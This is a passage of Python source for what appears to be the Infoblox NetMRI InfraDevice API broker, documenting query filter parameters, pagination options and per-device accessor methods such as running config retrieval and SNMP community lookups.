:param val_f_cap_vlan_assignment_ind: If op_cap_vlan_assignment_ind is specified, the field named in this input will be compared to the value in cap_vlan_assignment_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_vlan_assignment_ind must be specified if op_cap_vlan_assignment_ind is specified.
:type val_f_cap_vlan_assignment_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_vlan_assignment_ind: If op_cap_vlan_assignment_ind is specified, this value will be compared to the value in cap_vlan_assignment_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_vlan_assignment_ind must be specified if op_cap_vlan_assignment_ind is specified.
:type val_c_cap_vlan_assignment_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_vlan_assignment_na_reason: The operator to apply to the field cap_vlan_assignment_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_vlan_assignment_na_reason: Reason a regular data VLAN cannot be assigned to an interface of this device. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_vlan_assignment_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_vlan_assignment_na_reason: If op_cap_vlan_assignment_na_reason is specified, the field named in this input will be compared to the value in cap_vlan_assignment_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_vlan_assignment_na_reason must be specified if op_cap_vlan_assignment_na_reason is specified.
:type val_f_cap_vlan_assignment_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_vlan_assignment_na_reason: If op_cap_vlan_assignment_na_reason is specified, this value will be compared to the value in cap_vlan_assignment_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_vlan_assignment_na_reason must be specified if op_cap_vlan_assignment_na_reason is specified.
:type val_c_cap_vlan_assignment_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_voice_vlan_ind: The operator to apply to the field cap_voice_vlan_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_voice_vlan_ind: Capability of assigning a voice VLAN to an interface of this device. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_voice_vlan_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_voice_vlan_ind: If op_cap_voice_vlan_ind is specified, the field named in this input will be compared to the value in cap_voice_vlan_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_voice_vlan_ind must be specified if op_cap_voice_vlan_ind is specified.
:type val_f_cap_voice_vlan_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_voice_vlan_ind: If op_cap_voice_vlan_ind is specified, this value will be compared to the value in cap_voice_vlan_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_voice_vlan_ind must be specified if op_cap_voice_vlan_ind is specified.
:type val_c_cap_voice_vlan_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_voice_vlan_na_reason: The operator to apply to the field cap_voice_vlan_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_voice_vlan_na_reason: Reason a voice VLAN cannot be assigned to an interface of this device. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_voice_vlan_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_voice_vlan_na_reason: If op_cap_voice_vlan_na_reason is specified, the field named in this input will be compared to the value in cap_voice_vlan_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_voice_vlan_na_reason must be specified if op_cap_voice_vlan_na_reason is specified.
:type val_f_cap_voice_vlan_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_voice_vlan_na_reason: If op_cap_voice_vlan_na_reason is specified, this value will be compared to the value in cap_voice_vlan_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_voice_vlan_na_reason must be specified if op_cap_voice_vlan_na_reason is specified.
:type val_c_cap_voice_vlan_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_chassis_serial_number: The operator to apply to the field chassis_serial_number. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. chassis_serial_number: The combined, comma-separated serial numbers reported by the chassis SNMP MIB. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_chassis_serial_number: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_chassis_serial_number: If op_chassis_serial_number is specified, the field named in this input will be compared to the value in chassis_serial_number using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_chassis_serial_number must be specified if op_chassis_serial_number is specified.
:type val_f_chassis_serial_number: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_chassis_serial_number: If op_chassis_serial_number is specified, this value will be compared to the value in chassis_serial_number using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_chassis_serial_number must be specified if op_chassis_serial_number is specified.
:type val_c_chassis_serial_number: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_privileged_polling: The operator to apply to the field privileged_polling. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. privileged_polling: A flag indicating whether to poll the device in privileged mode. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_privileged_polling: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_privileged_polling: If op_privileged_polling is specified, the field named in this input will be compared to the value in privileged_polling using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_privileged_polling must be specified if op_privileged_polling is specified.
:type val_f_privileged_polling: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_privileged_polling: If op_privileged_polling is specified, this value will be compared to the value in privileged_polling using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_privileged_polling must be specified if op_privileged_polling is specified.
:type val_c_privileged_polling: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_rawSysDescr: The operator to apply to the field rawSysDescr. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. rawSysDescr: Unprocessed Device Description value as returned by SNMP. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_rawSysDescr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_rawSysDescr: If op_rawSysDescr is specified, the field named in this input will be compared to the value in rawSysDescr using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_rawSysDescr must be specified if op_rawSysDescr is specified.
:type val_f_rawSysDescr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_rawSysDescr: If op_rawSysDescr is specified, this value will be compared to the value in rawSysDescr using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_rawSysDescr must be specified if op_rawSysDescr is specified.
:type val_c_rawSysDescr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_rawSysModel: The operator to apply to the field rawSysModel. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. rawSysModel: Unprocessed Device Model value as returned by SNMP. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_rawSysModel: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_rawSysModel: If op_rawSysModel is specified, the field named in this input will be compared to the value in rawSysModel using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_rawSysModel must be specified if op_rawSysModel is specified.
:type val_f_rawSysModel: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_rawSysModel: If op_rawSysModel is specified, this value will be compared to the value in rawSysModel using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_rawSysModel must be specified if op_rawSysModel is specified.
:type val_c_rawSysModel: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_rawSysVersion: The operator to apply to the field rawSysVersion. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. rawSysVersion: Unprocessed Device Version value as returned by SNMP. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_rawSysVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_rawSysVersion: If op_rawSysVersion is specified, the field named in this input will be compared to the value in rawSysVersion using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_rawSysVersion must be specified if op_rawSysVersion is specified.
:type val_f_rawSysVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_rawSysVersion: If op_rawSysVersion is specified, this value will be compared to the value in rawSysVersion using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_rawSysVersion must be specified if op_rawSysVersion is specified.
:type val_c_rawSysVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the infra devices as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of infra device methods. The listed methods will be called on each infra device returned and included in the output. Available methods are: DeviceCommunitySecure, DeviceRank, DeviceCommunity, DeviceFirstOccurrence, group, parent_device, gateway_device, running_config, running_config_text, saved_config, saved_config_text, running_config_diff, saved_config_diff, virtual_child_count, asset_type, device_setting, data_collection_status, control_capabilities, network_name, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, privileged_polling, DeviceStartTime, DeviceEndTime, cap_description_ind, cap_admin_status_ind, cap_vlan_assignment_ind, cap_voice_vlan_ind, cap_net_provisioning_ind, cap_net_vlan_provisioning_ind, cap_net_deprovisioning_ind, cap_description_na_reason, cap_admin_status_na_reason, cap_vlan_assignment_na_reason, cap_voice_vlan_na_reason, cap_net_provisioning_na_reason, cap_net_vlan_provisioning_na_reason, cap_net_deprovisioning_na_reason, chassis_serial_number, available_mgmt_ips, rawSysDescr, rawSysVersion, rawSysModel, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: parent_device, device_setting, data_collection_status, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceID
:param sort: The data field(s) to use for sorting the output. Default is DeviceID. Valid values are DataSourceID, DeviceID, InfraDeviceStartTime, InfraDeviceEndTime, InfraDeviceChangedCols, DeviceIPDotted, DeviceIPNumeric, DeviceName, DeviceType, DeviceAssurance, DeviceVendor, DeviceModel, DeviceVersion, DeviceSysName, DeviceSysDescr, DeviceSysLocation, DeviceSysContact, DeviceDNSName, DeviceConfigTimestamp, DeviceFirstOccurrenceTime, InfraDeviceTimestamp, DeviceSAAVersion, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSavedConfigLastChangedTime, DeviceConfigLastCheckedTime, DevicePolicyScheduleMode, DeviceAddlInfo, DeviceMAC, ParentDeviceID, DeviceContextName, DeviceNetBIOSName, DeviceOUI, MgmtServerDeviceID, NetworkDeviceInd, RoutingInd, SwitchingInd, VirtualInd, FilteringInd, FilterProvisionData, VirtualNetworkID, VirtualNetworkingInd, DeviceUniqueKey.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each InfraDevice. Valid values are DataSourceID, DeviceID, InfraDeviceStartTime, InfraDeviceEndTime, InfraDeviceChangedCols, DeviceIPDotted, DeviceIPNumeric, DeviceName, DeviceType, DeviceAssurance, DeviceVendor, DeviceModel, DeviceVersion, DeviceSysName, DeviceSysDescr, DeviceSysLocation, DeviceSysContact, DeviceDNSName, DeviceConfigTimestamp, DeviceFirstOccurrenceTime, InfraDeviceTimestamp, DeviceSAAVersion, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSavedConfigLastChangedTime, DeviceConfigLastCheckedTime, DevicePolicyScheduleMode, DeviceAddlInfo, DeviceMAC, ParentDeviceID, DeviceContextName, DeviceNetBIOSName, DeviceOUI, MgmtServerDeviceID, NetworkDeviceInd, RoutingInd, SwitchingInd, VirtualInd, FilteringInd, FilterProvisionData, VirtualNetworkID, VirtualNetworkingInd, DeviceUniqueKey. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name used by NIOS GOTO to locate a row position within the records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field used by NIOS GOTO to locate a row position within the records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network ID to which results will be limited.
:type NetworkID: Integer
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if not combined with database-level filtering.
:type xml_filter: String
| ``api version min:`` 2.10
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param detail_ind: A flag indicating whether discovery times should be included.
:type detail_ind: Boolean
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return infra_devices: An array of the InfraDevice objects that match the specified input criteria.
:rtype infra_devices: Array of InfraDevice
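**Example**

A minimal sketch, assuming an authenticated ``InfobloxNetMRI`` client and that this broker is obtained via the client's ``get_broker`` helper; the host, credentials, DeviceID values, and serial-number pattern below are illustrative placeholders, not part of this method's contract::

    from infoblox_netmri.client import InfobloxNetMRI

    # Hypothetical client setup; host and credentials are placeholders.
    client = InfobloxNetMRI(host="netmri.example.com",
                            username="admin",
                            password="secret")
    broker = client.get_broker("InfraDevice")

    # Constant-value comparison (val_c_*) with pagination and sorting.
    devices = broker.find(op_chassis_serial_number="like",
                          val_c_chassis_serial_number="%FOC%",
                          start=0, limit=25,
                          sort=["DeviceID"], dir=["asc"])

    # Field-to-field comparison (val_f_*): rawSysDescr vs. DeviceSysDescr.
    matches = broker.find(op_rawSysDescr="=",
                          val_f_rawSysDescr="DeviceSysDescr")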
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def show(self, **kwargs):
"""Shows the details for the specified infra device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of infra device methods. The listed methods will be called on each infra device returned and included in the output. Available methods are: DeviceCommunitySecure, DeviceRank, DeviceCommunity, DeviceFirstOccurrence, group, parent_device, gateway_device, running_config, running_config_text, saved_config, saved_config_text, running_config_diff, saved_config_diff, virtual_child_count, asset_type, device_setting, data_collection_status, control_capabilities, network_name, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, privileged_polling, DeviceStartTime, DeviceEndTime, cap_description_ind, cap_admin_status_ind, cap_vlan_assignment_ind, cap_voice_vlan_ind, cap_net_provisioning_ind, cap_net_vlan_provisioning_ind, cap_net_deprovisioning_ind, cap_description_na_reason, cap_admin_status_na_reason, cap_vlan_assignment_na_reason, cap_voice_vlan_na_reason, cap_net_provisioning_na_reason, cap_net_vlan_provisioning_na_reason, cap_net_deprovisioning_na_reason, chassis_serial_number, available_mgmt_ips, rawSysDescr, rawSysVersion, rawSysModel, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: parent_device, device_setting, data_collection_status, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, data_source, device.
:type include: Array of String
| ``api version min:`` 2.10
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param detail_ind: A flag indicating whether discovery times should be included.
:type detail_ind: Boolean
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return infra_device: The infra device identified by the specified DeviceID.
:rtype infra_device: InfraDevice
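**Example**

A minimal sketch, reusing a ``broker`` obtained as in the ``find`` example (the DeviceID value is a placeholder)::

    device = broker.show(DeviceID=1234,
                         include=["device_setting", "interfaces"])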
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def update(self, **kwargs):
"""Updates an existing infra device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return id: The id of the updated infra device.
:rtype id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return model: The class name of the updated infra device.
:rtype model: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return uri: A URI that may be used to retrieve the updated infra device.
:rtype uri: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return infra_device: The updated infra device.
:rtype infra_device: InfraDevice
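**Example**

A minimal sketch (``broker`` and the DeviceID as in the earlier examples; any attribute updates supported by your NetMRI version would be passed as additional keyword arguments)::

    result = broker.update(DeviceID=1234)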
"""
return self.api_request(self._get_method_fullname("update"), kwargs)
def running_config_text(self, **kwargs):
"""The contents of the newest saved running config.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The contents of the newest saved running config.
:rtype : String
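**Example**

A minimal sketch (``broker`` and the DeviceID as in the earlier examples)::

    config = broker.running_config_text(DeviceID=1234)
    print(config)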
"""
return self.api_request(self._get_method_fullname("running_config_text"), kwargs)
def saved_config_text(self, **kwargs):
"""The contents of the newest saved startup config.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The contents of the newest saved startup config.
:rtype : String
"""
return self.api_request(self._get_method_fullname("saved_config_text"), kwargs)
def DeviceCommunity(self, **kwargs):
"""The community string.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The community string.
:rtype : String
"""
return self.api_request(self._get_method_fullname("DeviceCommunity"), kwargs)
def chassis_serial_number(self, **kwargs):
"""The combined comma separated serial numbers reported by the chassis snmp MIB.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The combined, comma-separated serial numbers reported by the chassis SNMP MIB.
:rtype : String
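**Example**

The single-field accessors on this broker all share this call shape; a minimal sketch (``broker`` and the DeviceID as in the earlier examples)::

    serials = broker.chassis_serial_number(DeviceID=1234)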
"""
return self.api_request(self._get_method_fullname("chassis_serial_number"), kwargs)
def available_mgmt_ips(self, **kwargs):
"""Available Management IPs for a device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Available Management IPs for a device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("available_mgmt_ips"), kwargs)
def data_source(self, **kwargs):
"""The NetMRI device that collected this record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The NetMRI device that collected this record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def parent_device(self, **kwargs):
"""The device containing this virtual device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device containing this virtual device.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("parent_device"), kwargs)
def gateway_device(self, **kwargs):
"""Returns the default gateway router for this device, based on the following in order of preference: device routing table, device configuration file, device subnet and common conventions.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Returns the default gateway router for this device, based on the following in order of preference: device routing table, device configuration file, device subnet and common conventions.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("gateway_device"), kwargs)
def running_config(self, **kwargs):
"""Returns the ConfigRevision object corresponding to the device's current running configuration.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Returns the ConfigRevision object corresponding to the device's current running configuration.
:rtype : ConfigRevision
"""
return self.api_request(self._get_method_fullname("running_config"), kwargs)
def saved_config(self, **kwargs):
"""Returns the ConfigRevision object corresponding to the device's current startup configuration.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Returns the ConfigRevision object corresponding to the device's current startup configuration.
:rtype : ConfigRevision
"""
return self.api_request(self._get_method_fullname("saved_config"), kwargs)
def device(self, **kwargs):
"""The general Device object corresponding to this infrastructure device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The general Device object corresponding to this infrastructure device.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
def asset_type(self, **kwargs):
"""The physical/virtual aspect of the device (Virtual Host, Virtual Device, or Physical Device).
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The physical/virtual aspect of the device (Virtual Host, Virtual Device, or Physical Device).
:rtype : String
"""
return self.api_request(self._get_method_fullname("asset_type"), kwargs)
def DeviceCommunitySecure(self, **kwargs):
"""The secured community name
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The secured community name.
:rtype : String
"""
return self.api_request(self._get_method_fullname("DeviceCommunitySecure"), kwargs)
def DeviceRank(self, **kwargs):
"""The rank of this device in its virtual brotherhood
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The rank of this device in its virtual brotherhood.
:rtype : Integer
"""
return self.api_request(self._get_method_fullname("DeviceRank"), kwargs)
def DeviceFirstOccurrence(self, **kwargs):
"""The first occurrence of this device
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The first occurrence of this device.
:rtype : DateTime
"""
return self.api_request(self._get_method_fullname("DeviceFirstOccurrence"), kwargs)
def virtual_child_count(self, **kwargs):
"""The number of virtual devices hosted on this device
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The number of virtual devices hosted on this device.
:rtype : Integer
"""
return self.api_request(self._get_method_fullname("virtual_child_count"), kwargs)
def device_setting(self, **kwargs):
"""The settings information for this device
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The settings information for this device.
:rtype : DeviceSetting
"""
return self.api_request(self._get_method_fullname("device_setting"), kwargs)
def data_collection_status(self, **kwargs):
"""All information about collection of data for this device
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : All information about data collection for this device.
:rtype : DataCollectionStatus
"""
return self.api_request(self._get_method_fullname("data_collection_status"), kwargs)
def running_config_diff(self, **kwargs):
"""The differences between the current and previous running config.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The differences between the current and previous running config.
:rtype : String
"""
return self.api_request(self._get_method_fullname("running_config_diff"), kwargs)
def saved_config_diff(self, **kwargs):
"""The differences between the current and previous saved config.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The differences between the current and previous saved config.
:rtype : String
"""
return self.api_request(self._get_method_fullname("saved_config_diff"), kwargs)
def network_name(self, **kwargs):
"""A Network View assigned to the device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : A Network View assigned to the device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("network_name"), kwargs)
def control_capabilities(self, **kwargs):
"""Capabilities of configuring the interfaces of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capabilities of configuring the interfaces of this device.
:rtype : String
"""
